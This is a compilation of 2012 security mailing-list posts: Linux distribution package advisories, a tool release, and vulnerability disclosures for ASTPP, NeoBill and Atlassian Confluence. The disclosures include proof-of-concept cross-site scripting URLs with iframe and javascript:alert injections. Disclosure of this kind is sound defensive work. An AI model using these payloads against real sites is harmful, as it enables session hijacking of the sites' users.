[SECURITY] [DSA 2480-4] request-tracker3.8 regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2480-4 secur...@debian.org http://www.debian.org/security/ Raphael Geissert September 15, 2012 http://www.debian.org/security/faq - - Package: request-tracker3.8 Vulnerability : regression Debian-specific: no The security updates for request-tracker3.8, DSA-2480-1, DSA-2480-2, and DSA-2480-3, contained minor regressions. Namely: * The calendar popup page in Internet Explorer would be blocked by the CSRF protection mechanism. * Search results pages could not be shared without saving, sharing, and then loading the search. * rt-email-dashboards would fail with an error due to a call to an undefined interp method. Please note that if you run request-tracker3.8 under the Apache web server, you must stop and start Apache manually. The restart mechanism is not recommended, especially when using mod_perl. For the stable distribution (squeeze), this problem has been fixed in version 3.8.8-7+squeeze5. We recommend that you upgrade your request-tracker3.8 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBUw7kACgkQYy49rUbZzloRmgCfRWU98a5Ug1c5HSGr9ltpRo17 hU8An0wDUZTxSnOEuHfScdRcmuCYB1aW =BaTL -END PGP SIGNATURE-
[SECURITY] [DSA 2549-1] devscripts security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2549-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert September 15, 2012 http://www.debian.org/security/faq - - Package: devscripts Vulnerability : multiple Problem type : local (remote) Debian-specific: no CVE ID : CVE-2012-2240 CVE-2012-2241 CVE-2012-2242 CVE-2012-3500 Multiple vulnerabilities have been discovered in devscripts, a set of scripts to make the life of a Debian Package maintainer easier. The following Common Vulnerabilities and Exposures project ids have been assigned to identify them: CVE-2012-2240: Raphael Geissert discovered that dscverify does not perform sufficient validation and does not properly escape arguments to external commands, allowing a remote attacker (as when dscverify is used by dget) to execute arbitrary code. CVE-2012-2241: Raphael Geissert discovered that dget allows an attacker to delete arbitrary files when processing a specially-crafted .dsc or .changes file, due to insuficient input validation. CVE-2012-2242: Raphael Geissert discovered that dget does not properly escape arguments to external commands when processing .dsc and .changes files, allowing an attacker to execute arbitrary code. This issue is limited with the fix for CVE-2012-2241, and had already been fixed in version 2.10.73 due to changes to the code, without considering its security implications. CVE-2012-3500: Jim Meyering, Red Hat, discovered that annotate-output determines the name of temporary named pipes in a way that allows a local attacker to make it abort, leading to denial of service. Additionally, a regression in the exit code of debdiff introduced in DSA-2409-1 has been fixed. For the stable distribution (squeeze), these problems have been fixed in version 2.10.69+squeeze4. For the testing distribution (wheezy), these problems will be fixed soon. For the unstable distribution (sid), these problems will be fixed in version 2.12.3. We recommend that you upgrade your devscripts packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBUxE4ACgkQYy49rUbZzlpq0ACfaegRy0LXMZmnnJ/fwi2PH1iB 5XcAnjbRtMlPy1+PASvWy4/DI+Zm3PuR =VmvQ -END PGP SIGNATURE-
[ MDVSA-2012:153 ] dhcp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:153 http://www.mandriva.com/security/ ___ Package : dhcp Date: September 16, 2012 Affected: Enterprise Server 5.0 ___ Problem Description: A security issue was identified and fixed in dhcp: ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced (CVE-2012-3955). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3955 https://kb.isc.org/article/AA-00779 ___ Updated Packages: Mandriva Enterprise Server 5: d7c53f0bdfb976d7e391ab03ba330f0a mes5/i586/dhcp-client-4.1.2-0.8mdvmes5.2.i586.rpm 7114cd0bd9181450e7f870eaecf78b71 mes5/i586/dhcp-common-4.1.2-0.8mdvmes5.2.i586.rpm 92489f461fb0409f741250572dcd32f9 mes5/i586/dhcp-devel-4.1.2-0.8mdvmes5.2.i586.rpm d1e62d5ecc85bce8925187ee43bf7fd4 mes5/i586/dhcp-doc-4.1.2-0.8mdvmes5.2.i586.rpm 01700c9011875ed4e3f3fee02f1f7d46 mes5/i586/dhcp-relay-4.1.2-0.8mdvmes5.2.i586.rpm 78f3dfa78a3258ae3fb6e7364819f173 mes5/i586/dhcp-server-4.1.2-0.8mdvmes5.2.i586.rpm 3ef70d584592f7c1fcfbc5370d4199cb mes5/SRPMS/dhcp-4.1.2-0.8mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: df0e98aa316894f3ca9d846573ea811d mes5/x86_64/dhcp-client-4.1.2-0.8mdvmes5.2.x86_64.rpm 2cfc9181bc5f260063a5978b610af003 mes5/x86_64/dhcp-common-4.1.2-0.8mdvmes5.2.x86_64.rpm d8c41be05d8506e3ce65f7f501510682 mes5/x86_64/dhcp-devel-4.1.2-0.8mdvmes5.2.x86_64.rpm 1a875506e6b6e686f75496560e0560ac mes5/x86_64/dhcp-doc-4.1.2-0.8mdvmes5.2.x86_64.rpm 1c2ddd51c919b480daf912ed59eadcd2 mes5/x86_64/dhcp-relay-4.1.2-0.8mdvmes5.2.x86_64.rpm 5b7b0f32cf2e834c68021620c93515a0 mes5/x86_64/dhcp-server-4.1.2-0.8mdvmes5.2.x86_64.rpm 3ef70d584592f7c1fcfbc5370d4199cb mes5/SRPMS/dhcp-4.1.2-0.8mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQVX4JmqjQ0CJFipgRAu+KAJ9/13Mqxb0vf1Y6Gn1f3I5w9SgwTQCZAUwF hJHvnBtt4jQR4CKYQsJXGsg= =a7nw -END PGP SIGNATURE-
[SECURITY] [DSA 2548-1] Debian Security Team PGP/GPG key change notice
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2548-1 secur...@debian.org http://www.debian.org/security/Nico Golde September 13, 2012 http://www.debian.org/security/faq - - This is a notice to inform you, that our previous PGP/GPG key expired. The fingerprint of the *old* key is: 2764 4A76 61FD 9614 BCD6 844F 370E 2BFC 68B6 4E0D The *new* key fingerprint is: BACB 4B5C 30AC 38F3 19EE 961E 2702 CAEB 90F8 EEC5 Please use the new key from now on for encrypted communication with the Debian Security Team. Please obtain the new key from a keyserver, e.g., http://pgp.surfnet.nl/pks/lookup?op=vindexsearch=0xBACB4B5C30AC38F319EE961E2702CAEB90F8EEC5 Our website will be updated shortly to reflect this change. Further information is available at http://www.debian.org/security/. Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBRtmgACgkQHYflSXNkfP+ulgCfa4SEWA+rgujISyAWF22eveAx PT4An20bkhJOeoUMRV+LMLibpXhdQyEi =BO8T -END PGP SIGNATURE-
ipv6mon v1.0 released! (IPv6 address monitoring daemon)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Folks, We are pleased to announce the release of ipv6mon v1.0! ** Description ** ipv6mon (http://www.si6networks.com/tools/ipv6mon) is a tool for monitoring IPv6 address usage on a local network. It is meant to be particularly useful in networks that employ IPv6 Stateless Address Auto-Configuration (as opposed to DHCPv6), where address assignment is decentralized and there is no central server that records which IPv6 addresses have been assigned to which nodes during which period of time. ipv6mon employs active probing to discover IPv6 addresses in use, and determine whether such addresses remain active. ** Latest release ** The latest release of ipv6mon is v1.0, and is available at: http://www.si6networks.com/tools/ipv6mon/ipv6mon-v1.0.tar.gz ** Documentation ** PDF versions of the ipv6mon manuals are available on-line at: http:://www.si6networks.com/tools/ipv6mon ** GIT repository ** The GIT repository for the ipv6mon is: https://github.com/fgont/ipv6-toolkit.git ** IPv6 security trainings ** Development of ipv6mon is partially supported through our IPv6 security trainings. Please consider attending one of our upcoming trainings http://www.hackingipv6networks.com/upcoming-t Follow us on twitter: @SI6Networks Best regards, - -- Fernando Gont SI6 Networks e-mail: fg...@si6networks.com PGP Fingerprint: 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iQIcBAEBAgAGBQJQUc5sAAoJEK4lDVUdTnSSAh0P/RrAyh1+ZfLVT3poHUGQ/B+M OpJ5X+nJijmoCmgBkpr6ffj8eVB1wqIRgmw/Y/7DlgVK1+ZGYhl5wwgMNGfTiSfS hLtNjtSc6YRXxLXEYhfXaGN4SNy70ExD3fB+PTtqbyAcuuaIqx7iAwQmhkXCv8gK RnSEE+DuGn0M/+9RUEjEcAZIf/rfyRy612VhDR791HoL79p8yqK962tLbKpTFBdt dmd8UFv3tuaVkmBsUmqN/8zuB7+IpwH9x88mRZeD4F/JLAMSwl9cZ17n5MIODUrg AWU9JcXKIKY0XfmdM6EEYrqLtE/o2Ea8R6IXuQgPb04v/q/WAh3E8LXN/AwtFW/4 6l9gL2PhmFBp5BnGjpay9sZZ+HdcKOugwnTFZNqxWd+FLulk/zqW7SWmvyUZ+8B1 P0QRmXfPrDqeztBEeZunS99XsuTMShct/bauVg0aTxO9KJcb3JJhnRsKqoadpLQd QE87EEcolRh5Hpxm2ixS9sjs3yAvtHx9iSIrZBcYZKHr2gp44d4oIk2zlqmZiw36 m3jpPTd3CRiIVmQjJZShu4kyj5/cKQqc8hZhlUNC4Nx0EfPmCKPpHyP31IsO9xcd CEIVo7vzJeq7sZcniacx6ZgrCyFuhZdzhklfd6aX9ncex12smQZrOJuLuX2DF+ty fmU9dFafK7ig5rGdoQxB =HTY+ -END PGP SIGNATURE-
ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities
Title: == ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities Date: = 2012-08-17 References: === http://www.vulnerability-lab.com/get_content.php?id=687 VL-ID: = 687 Common Vulnerability Scoring System: 4 Introduction: = ASTPP is a billing solution for Freeswitch and Asterisk. It supports pre-paid and post-paid billing with call rating and credit control. It also provides many other features such as calling cards, least cost routing (LCR), did management, resellers, callbacks, etc. ... Customer Account Features Reseller Support Call Rating Capabilities Least Cost Failover Routing Credit Control DID Mapping Automated Account Device Management Authentication Calling Cards Vendor Billing Asterisk -Real-time Support ASTPP is able to integrate with OSCommerce to provide a Web store for your users to purchase calling cards and sign up for VoIP accounts. We also support multiple currency for each account type with real-time update using Yahoo Finance (http://finance.yahoo.com/currency-converter). (Copy of the Vendor Homepage: http://www.astpp.org/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the ASTPP VoIP (4cf207a) phone billing web application. Report-Timeline: 2011-08-17: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent input validation vulnerabilities are detected in the ASTPP VoIP (4cf207a) phone billing web application. The web vulnerabilities allow remote attackers to implement/inject malicious script code on the application side (persistent). The first persistent web vulnerability is located in the user management (admin) module with the bound vulnerable firstname, lastname company parameters. The first vulnerability can easily be exploited by customers to execute script code out of the administrator user management module (backend). The customer can register with the malicious values or change the vulnerable values via update profile after successful registration with a non malicious user. The secound and third vulnerabilities are located in the add dids and add trunks module with the bound vulnerable access number, note, trunk name, dialed number mods parameters. The 4th persistent vulnerability is located in the Taxes - Tax Information modules with the bound vulnerable priority description application parameters. Successful exploitation of the vulnerabilities can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action low privileged web application user account. Vulnerable Module(s): [+] Account Management [+] DIDs - Add New Your Own DIDs [+] Trunks - Add Trunks [+] Taxes - Tax Information Vulnerable Parameter(s): [+] Firstname, Lastname Company [+] Access Number Note [+] Trunk Name, Dialed Number Mods - Actions [+] Priority Description Affected Section(s): [+] Account Listing - Actions [+] DIDs - Edit Mask Listing [+] Trunks Listing (Management) [+] Tax - Edit Mask Listing Proof of Concept: = The persistent vulnerabilities can be exploited by remote attacker with low privileged user account and with low required user inter action. For demonstration or reproduce ... Review: Account Management - User Account Listing div style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;venky/div/div/tdtd align=centerdiv style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal; /div/div/td td align=centerdiv style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;[PERSISTENT INJECTED SCRIPT CODE] /div/div/tdtd align=centerdiv style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;[PERSISTENT INJECTED SCRIPT CODE]/div/div/tdtd align=rightdiv style=text-align: right; width: 70px; white-space: normal;div style=text-align: right; width: 70px; white-space: normal;0. USD/div/div/tdtd align=rightdiv style=text-align: right; width: 70px; white-space: normal;div style=text-align: right; width: 75px; white-space: normal;0. USD/div/div/tdtd align=centerdiv style=text-align: center; width: 70px; white-space:
NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities
Title: == NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities Date: = 2012-08-18 References: === http://www.vulnerability-lab.com/get_content.php?id=685 VL-ID: = 685 Common Vulnerability Scoring System: 3.5 Introduction: = NeoBill is a web-based Customer Management and Billing solution designed for web hosting providers, particularly hosting resellers. It is developed in PHP, uses MySQL as the backend database, and is licensed under the GPL. The script supports independent payment gateways, and registrars of domain names. Key features of the product: * Open source (GPL) * Support for PHP4 and PHP5 * Use MySQL database * Independent Payment Gateways Module * Indepenent Domain Registrar Module * Multi-user system * The ability to integrate third-party modules * Using Smarty templates * Checking the active, inactive and pending accounts * Attachments to the memos Account * Sending predefined e-mail\\\'ov for new customers * Creating and editing accounts, which can be printed or sent by mail to its customers * Accounts can be generated by one or all at once * Payments * Set one-time and monthly payments for each service / service * Services have a duration of 1,3,6 and 12 months * Domain registration through API Directi (Copy of the Vendor Homepage: http://www.neobill.net/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the NeoBill v0.8 Alpha Content Management System. Report-Timeline: 2012-08-19: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: 1.1 A persistent input validation vulnerability is detected in the NeoBill v0.8 Alpha Content Management System. The vulnerability allows remote attackers or local low privileged user account to inject/implement malicious persistent script code on application side of the neobill v0.8 web application. The vulnerability is located in the user account module with the bound vulnerable contactname or username parameters. Attackers can inject via register account or update profile malicious persistent script codes as companyname and username. The code will be persistent executed in the administration backend when processing to watching the user account listings. Successful exploitation of the vulnerability result in persistent session hijacking attacks, persistent phishing requests stable persistent module context manipulation. Vulnerable Module(s): [+] User Accounts - Management [Admin Backend] Vulnerable Parameter(s): [+] Contactname [+] Username 1.2 Multiple client side cross site scripting vulnerabilities are detected in the NeoBill v0.8 Alpha Content Management System. The vulnerability allows an remote attacker to manipulate client side application requests with medium or high required user inter action. The vulnerabilities are located in the unsanitized output of the Uncaught SWException Invalid Object Exception web application modules. Successful exploitation of the vulnerability result in client side session hijacking, non-persistent phishing requests non-persistent module context manipulation. Vulnerable Module(s): [+] 2 x Exception Handling Vulnerable Parameter(s): [+] Uncaught SWException Handling [+] Invalid Object Exception Handling Proof of Concept: = 1.1 The persistent web vulnerability can be exploited by remote attacker with low privileged application user account and low required user inter action. For demonstration or reproduce ... Review: Listing - Contactname Username tr td a href=http://neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=config_edit_useruser=admin;admin/a /td td Administrator /td td admin admin [PERSISTET INJECTED SCRIPT CODE!])' = td= td a href=mailto:sy...@neobill.servertest.de;sy...@neobill.servertest.de/a /td Affected User Account - Listing: http://neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=config_edit_useruser=admin http://neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=config_users 1.2 The non persistent cross site scripting vulnerabilities can be exploited by remote attackers without low privileged application user account with medium or high required user inter action. For demonstration or reproduce ... Exception Handling - Uncaught SWException Invalid Object Exception neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C
[INTREST SEC] Atlassian Confluence Wiki XSS Vulnerability
--- INTREST SEC | Security Advisory --- Product: Confluence Wiki Vendor:Atlassian (www.atlassian.com) Vulnerability Type:Cross Site Scripting (XSS) Risk Level:High (classified by vendor) Discovered by: INTREST SEC - NID Public Diclosure: 2012/09/12 Vendor Notification: 2012/02/07 Tested Versions: 3.5.9, 4.0.3, 4.1.4 CVSS Score:7.5 ## Details Atlassian Confluence is described as Collaboration tool for teams to create, share, and discuss rich content - docs, files, ideas, specs, diagrams, mockups, anything. (www.atlassian.com) ## Description A security vulnerability within Atlassian Confluence Wiki has been identified. It is remotely exploitable and based on the CWE-79 family Cross-Site-Scripting (XSS). Confluence allows input passed in the URL to be injected into the HTML structure of an error-page in an unsafe and unsanitized way. Therefore it is possible to inject nonpersistent JavasScript code. This vulnerability does not require authentication of the victim and can easily be exploited by manipulating the GET request. ## Proof of Concept The following URL triggers the XSS by including IFRAME SRC=javascript:alert('XSS') into the error page: http://localhost:8090/pages/includes/ status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm ## Solution According to the vendor, upgrade to Confluence 4.1.9 or later. ## References [1] Atlassian Security Advisory https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2012-09-11 ## Time Table [2012/02/07] Informed vendor about the vulnerability via ticketing system [2012/02/08] Informed vendor that Atlassian JIRA (at least 4.4.3 and 4.4.4) is also infected [2012/02/09] Vendor created a ticket for JIRA vulnerability [2012/02/09] Vendor response: JIRA problem already known. The fix should be available in JIRA 5.0 or 5.0.1 [2012/03/21] Vendor tagged ticket as fixed. [2012/04/02] Asked vendor about things like patch release date, requesting a CVE number, releasing an advisory [2012/04/03] Vendor response: No dedicated Patch; Version 4.1.9 has been released; no CVE will requested by vendor [2012/08/27] Vendor defined advisory release date to 2012/09/11 [2012/08/27] Informed vendor about additional advisory release through INTREST SEC [2012/09/11] Vendor released advisory [2012/09/13] INTREST SEC released advisory -- INTREST SEC Intelligent Information Security --- Kommunalstrasse 15 - A-4020 Linz - Austria Tel. +43 (0) 732 / 341 060 Fax. +43 (0) 732 / 341 060 - 20 researchlab [at] intrest.at | www.intrest-sec.com ---
[slackware-security] patch (SSA:2012-257-02)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] patch (SSA:2012-257-02) New patch packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37, and -current to fix a security issue. Here are the details from the Slackware 13.37 ChangeLog: +--+ patches/packages/patch-2.7-i486-1_slack13.37.txz: Upgraded. This version of patch ignores destination filenames that are absolute or that contain a component of .., unless such a filename is provided as an argument. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4651 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 12.1: ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/patch-2.7-i486-1_slack12.1.tgz Updated package for Slackware 12.2: ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/patch-2.7-i486-1_slack12.1.tgz Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/patch-2.7-i486-1_slack13.0.txz Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/patch-2.7-x86_64-1_slack13.0.txz Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/patch-2.7-i486-1_slack13.1.txz Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/patch-2.7-x86_64-1_slack13.1.txz Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/patch-2.7-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/patch-2.7-x86_64-1_slack13.37.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/patch-2.7-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/patch-2.7-x86_64-1.txz MD5 signatures: +-+ Slackware 12.1 package: ebe093df28fc95c594af368597bf7262 patch-2.7-i486-1_slack12.1.tgz Slackware 12.2 package: f39f3ce8bbba509b7e266b6c8c9dcf47 patch-2.7-i486-1_slack12.1.tgz Slackware 13.0 package: e8404d45a3b51f8a7ad67efedfb488d9 patch-2.7-i486-1_slack13.0.txz Slackware x86_64 13.0 package: 90d8b1e9237fe5080bd56a42de14d554 patch-2.7-x86_64-1_slack13.0.txz Slackware 13.1 package: f0fdc8a64eb8051527e9854ea9adba72 patch-2.7-i486-1_slack13.1.txz Slackware x86_64 13.1 package: 60c3b0f3d1bc49b7e0140cbe65114560 patch-2.7-x86_64-1_slack13.1.txz Slackware 13.37 package: e70793008f94ef1f7f39b5e444bce6eb patch-2.7-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 6fc457dbe6d32fd747336eb271a49c08 patch-2.7-x86_64-1_slack13.37.txz Slackware -current package: 95134353a77428529c66f801f405bc05 a/patch-2.7-i486-1.txz Slackware x86_64 -current package: e0128639a440509600c060f2cd1e0530 a/patch-2.7-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg patch-2.7-i486-1_slack13.37.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBSlvYACgkQakRjwEAQIjNq4QCfToYaW19I79R748n7LK5gRxdN VdwAn1gKwMwexSfYJRQNcFTZdT7Ii4ip =HZF+ -END PGP SIGNATURE-
[slackware-security] bind (SSA:2012-257-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] bind (SSA:2012-257-01) New bind packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37, and -current to fix a security issue. Here are the details from the Slackware 13.37 ChangeLog: +--+ patches/packages/bind-9.7.6_P3-i486-1_slack13.37.txz: Upgraded. This update fixes a security issue where named could crash on a specially crafted record. [RT #30416] (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 12.1: ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.7.6_P3-i486-1_slack12.1.tgz Updated package for Slackware 12.2: ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/bind-9.7.6_P3-i486-1_slack12.2.tgz Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.7.6_P3-i486-1_slack13.0.txz Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.7.6_P3-x86_64-1_slack13.0.txz Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.7.6_P3-i486-1_slack13.1.txz Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.7.6_P3-x86_64-1_slack13.1.txz Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.7.6_P3-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.7.6_P3-x86_64-1_slack13.37.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.9.1_P3-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.9.1_P3-x86_64-1.txz MD5 signatures: +-+ Slackware 12.1 package: 938f69331ed3a3b899a389b32c9146c2 bind-9.7.6_P3-i486-1_slack12.1.tgz Slackware 12.2 package: c8298568f3ced83874a6249f4d6837e2 bind-9.7.6_P3-i486-1_slack12.2.tgz Slackware 13.0 package: f2d5fe887610219c470dbeca820be1bd bind-9.7.6_P3-i486-1_slack13.0.txz Slackware x86_64 13.0 package: 0bc9402be113069e2a739a9d67ce2e4a bind-9.7.6_P3-x86_64-1_slack13.0.txz Slackware 13.1 package: 7a07e7258b644f9563ced540dfebde95 bind-9.7.6_P3-i486-1_slack13.1.txz Slackware x86_64 13.1 package: 3bfac2cd06c9414f802e8196b01f5b0a bind-9.7.6_P3-x86_64-1_slack13.1.txz Slackware 13.37 package: d8bb47c0239269a4bc50abe239b08f17 bind-9.7.6_P3-i486-1_slack13.37.txz Slackware x86_64 13.37 package: 120ce7a68696d1328ee9ab0f23e370fc bind-9.7.6_P3-x86_64-1_slack13.37.txz Slackware -current package: b2b7ba05349ad9aa1ef8ebd110132d3e n/bind-9.9.1_P3-i486-1.txz Slackware x86_64 -current package: 97b2b2ccbbc22e91c0a7451f4d25c1ae n/bind-9.9.1_P3-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg bind-9.7.6_P3-i486-1_slack13.37.txz Then, restart the name server: # /etc/rc.d/rc.bind restart +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlBSluMACgkQakRjwEAQIjOb4gCfaO1KUFx64eMxAD1r9MjPPQGB /00An0pVuozd1u+Z+cHR6Q2QONDlYNda =tAm8 -END PGP SIGNATURE-
[slackware-security] dhcp (SSA:2012-258-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] dhcp (SSA:2012-258-01) New dhcp packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37, and -current to fix a security issue. Here are the details from the Slackware 13.37 ChangeLog: +--+ patches/packages/dhcp-4.2.4_P2-i486-1_slack13.37.txz: Upgraded. An issue with the use of lease times was found and fixed. Making certain changes to the end time of an IPv6 lease could cause the server to abort. Thanks to Glen Eustace of Massey University, New Zealand for finding this issue. [ISC-Bugs #30281] For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3955 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 12.1: ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack12.1.tgz Updated package for Slackware 12.2: ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack12.2.tgz Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack13.0.txz Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/dhcp-4.1_ESV_R7-x86_64-1_slack13.0.txz Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/dhcp-4.1_ESV_R7-i486-1_slack13.1.txz Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/dhcp-4.1_ESV_R7-x86_64-1_slack13.1.txz Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/dhcp-4.2.4_P2-i486-1_slack13.37.txz Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/dhcp-4.2.4_P2-x86_64-1_slack13.37.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dhcp-4.2.4_P2-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/dhcp-4.2.4_P2-x86_64-1.txz MD5 signatures: +-+ Slackware 12.1 package: eb9eb46069d67590e3e07029a4a71d07 dhcp-4.1_ESV_R7-i486-1_slack12.1.tgz Slackware 12.2 package: fca847eea77fc1d63f39abd7508c894b dhcp-4.1_ESV_R7-i486-1_slack12.2.tgz Slackware 13.0 package: 